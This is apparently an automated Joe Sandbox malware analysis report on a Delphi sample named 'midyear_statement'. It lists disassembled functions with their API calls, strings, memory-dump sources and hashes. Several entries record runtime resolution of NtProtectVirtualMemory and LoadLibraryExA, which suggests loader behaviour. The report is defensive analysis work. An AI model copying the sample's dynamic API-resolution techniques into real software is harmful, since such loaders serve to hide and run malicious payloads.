                                                                                                                                                                                          • Opcode Fuzzy Hash: 24792e07a1d72189cb715aaab2dec05e46d6750a08ea6f7e79a995eec708ed3f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF0ACF0688301AFB200BFF0DC95AAB3668DA6050C30D5C36A49579901DA7FBC109F5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 040A28CE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                          • API String ID: 2030045667-32948583
                                                                                                                                                                                          • Opcode ID: 49f1f83fd927254d3cf46612da0d65ad88e6cd3b933f256252f24ad7c124e064
                                                                                                                                                                                          • Instruction ID: f728344241ca820d4274149bc884640428dbe27abf759f8d1a63cc11067b9e9b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49f1f83fd927254d3cf46612da0d65ad88e6cd3b933f256252f24ad7c124e064
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17A1F830B042548BEB21EBACCC84BD876E4EB09758F1440FDE949BB382DB75A9D5CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B9FF8 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 040BA018
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 040BA02F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 040BA035
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 040BA0C3
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 040BA0CF
                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 040BA0E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • LoadLibraryExA, xrefs: 040BA025
                                                                                                                                                                                          • C:\Windows\System32\KernelBase.dll, xrefs: 040BA02A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Read$AddressHandleModuleProc
                                                                                                                                                                                          • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                                                                          • API String ID: 1061262613-1650066521
                                                                                                                                                                                          • Opcode ID: bf19b7b4d97711e9d3da125232b66cf9ce2552c3fbb8c3f1870df74e8018c2a8
                                                                                                                                                                                          • Instruction ID: 06d7737d8c0213f45a686bf118c1498d0d809f533108b9daea386c469fb77923
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf19b7b4d97711e9d3da125232b66cf9ce2552c3fbb8c3f1870df74e8018c2a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE3164B1700704BBEB60DFA4CC41FDA77A8AF05368F044564FA94BB281D371B5509BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 040A2849
                                                                                                                                                                                          • Unexpected Memory Leak, xrefs: 040A28C0
                                                                                                                                                                                          • bytes: , xrefs: 040A275D
                                                                                                                                                                                          • , xrefs: 040A2814
                                                                                                                                                                                          • 7, xrefs: 040A26A1
                                                                                                                                                                                          • An unexpected memory leak has occurred. , xrefs: 040A2690
                                                                                                                                                                                          • The unexpected small block leaks are:, xrefs: 040A2707
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                                                                          • Opcode ID: 4286056f720e5cbce787b5ca076235165b889c422895e7190d12d3212bd613b9
                                                                                                                                                                                          • Instruction ID: 2f350bfc8bd1eef1bbdb700bd60f153fdbc64c27b85988f1a43a429e2fafa42a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4286056f720e5cbce787b5ca076235165b889c422895e7190d12d3212bd613b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: A171E730A042588FEB21DBACCC84BD8B6E4EB09748F1441F9E549FB381DB75AAD5CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040ABD04 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,040ABFCF,?,?,00000000,00000000), ref: 040ABD3A
                                                                                                                                                                                            • Part of subcall function 040AA708: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                                          • Opcode ID: 75d0743507b3e71bfda660163a65b11554f5db9a9ac6950dc7daf258ec924205
                                                                                                                                                                                          • Instruction ID: f6368c2b5c02bbd574c3b442d88881bb8a8f85b739ab2e6333897c24e4e1c15d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d0743507b3e71bfda660163a65b11554f5db9a9ac6950dc7daf258ec924205
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C613F38B001495BFB00EBE4DC80ADF76B6DB8820CF559535E601BB785DA38F926DB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A42F0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?,040FF7C8,?,?,040CC7A8,040A6521,040CB305), ref: 040A4329
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?,040FF7C8,?,?,040CC7A8,040A6521,040CB305), ref: 040A432F
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,040A4378,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?,040FF7C8), ref: 040A4344
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,040A4378,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040A43B7,?,?), ref: 040A434A
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 040A4368
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                          • Opcode ID: 8fea0b5c0d51afc905713e640c5882aef7fbf51b082de6ce381d56c5aabe81e4
                                                                                                                                                                                          • Instruction ID: d074036b25b28dcad7a87f1ae6e700467dbf4723ef3e50608c2e5e3c3088b9cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fea0b5c0d51afc905713e640c5882aef7fbf51b082de6ce381d56c5aabe81e4
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F09675A84340B5FA50A7E49C09F9D264C9B85B1DF104329B215BC4C187ECB4E49765
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AAE08 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040AAC80: VirtualQuery.KERNEL32(?,?,0000001C), ref: 040AAC9D
                                                                                                                                                                                            • Part of subcall function 040AAC80: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040AACC1
                                                                                                                                                                                            • Part of subcall function 040AAC80: GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040AACDC
                                                                                                                                                                                            • Part of subcall function 040AAC80: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 040AAD72
                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 040AAE3F
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 040AAE5C
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 040AAE62
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,040AAECC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 040AAE77
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,040AAECC,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 040AAE7D
                                                                                                                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 040AAE9F
                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 040AAEB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 185507032-0
                                                                                                                                                                                          • Opcode ID: 0b8823413c90e1c6c675d73c7c7037f6242fb5aa676aa1f8bdb8288b128dab98
                                                                                                                                                                                          • Instruction ID: 545ab425f2794589ee1c9348865f5f5365dc71849d8e2fb9ca84b5e234a9efc9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b8823413c90e1c6c675d73c7c7037f6242fb5aa676aa1f8bdb8288b128dab98
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11112EB1248204BEF600EBE4CC45FDB77ECAB4560CF484925B694F70D0DA7AF9648B66
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AE4D0 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 040AE569
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 040AE585
                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 040AE5BE
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 040AE63B
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 040AE654
                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 040AE689
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                                          • Opcode ID: 3f1af814a70b55c8983532a9b397cc056dbba34976dda2b19a0d1271600644cc
                                                                                                                                                                                          • Instruction ID: fc9a3535263ae023aa2297d5c5ca717b0e7eab39a94335d46935cb4bc4c6cc9b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f1af814a70b55c8983532a9b397cc056dbba34976dda2b19a0d1271600644cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: F2510F759416299BDB62EFA8CC90BD9B3FDAF48208F0441D5E509F7211D630BF948FA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A352C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 040A354E
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,040A359D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 040A3581
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,040A35A4,00000000,?,00000004,00000000,040A359D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 040A3597
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                          • Opcode ID: 4bf37be26f9201b45f049cc97cf04c9c2999bb80faddc977a87a8ad8920661d4
                                                                                                                                                                                          • Instruction ID: e3df1528fba73c6d53b646c673047f2bba6e85dbb39a780d74bf780d519eb798
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf37be26f9201b45f049cc97cf04c9c2999bb80faddc977a87a8ad8920661d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9001B5B5904318BAEB11EFE4CD06FF9B7ECDB08704F200161BA04FA580E678AA20DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AA994 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,040AAA2B,?,?,00000000), ref: 040AA9AC
                                                                                                                                                                                            • Part of subcall function 040AA708: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,040AAA2B,?,?,00000000), ref: 040AA9DC
                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A8E0,00000000,00000000,00000004), ref: 040AA9E7
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,040AAA2B,?,?,00000000), ref: 040AAA05
                                                                                                                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000003), ref: 040AAA10
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4102113445-0
                                                                                                                                                                                          • Opcode ID: b5a0d534e9885779cbd37e198442baf1eb6784505a3590c054c796a54d5dc8ee
                                                                                                                                                                                          • Instruction ID: 7736895e3252747cc6a0ddea8deb6a07605955720db21403770a6988f81105ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5a0d534e9885779cbd37e198442baf1eb6784505a3590c054c796a54d5dc8ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D01DF357002046BF711ABF4CC11BDA76A8DB5661CF554920F500BAAC0E669BE21CAA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AAA44 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,040AAC14,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 040AAA73
                                                                                                                                                                                            • Part of subcall function 040AA708: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 040AA726
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                                          • Opcode ID: f783715013a877157a84e8f45dcbe65b00fb6e14bd38843233a48817661e3e70
                                                                                                                                                                                          • Instruction ID: 030bb7af5d964707906bfd66f50b307ab24a0336ac3a4d5640d913b8f60784be
                                                                                                                                                                                          • Opcode Fuzzy Hash: f783715013a877157a84e8f45dcbe65b00fb6e14bd38843233a48817661e3e70
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B4102387241444BF751AAF9C8806FEF2E6DB8520CB548521D441F33D1E669FD2ADE62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B798C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 040B7999
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040B799F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • NtProtectVirtualMemory, xrefs: 040B798F
                                                                                                                                                                                          • C:\Windows\System32\ntdll.dll, xrefs: 040B7994
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                          • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                                                                          • API String ID: 1646373207-1386159242
                                                                                                                                                                                          • Opcode ID: 0f2a53f3d3df3cb8407f0e0b524bec720c627bad8fa39efe5f2ac44919ca26f1
                                                                                                                                                                                          • Instruction ID: bf6f29efa8ecce1a4b978f6ba804a21c5c94829b4d4d867af65120e40e451ac7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f2a53f3d3df3cb8407f0e0b524bec720c627bad8fa39efe5f2ac44919ca26f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E0BFB5140209AF8B40DFE9D845ECB3BECAB5C2147048411B958DB200C675F8518FB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040AC3B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,040CB10B,00000000,040CB11E), ref: 040AC3BE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 040AC3CF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
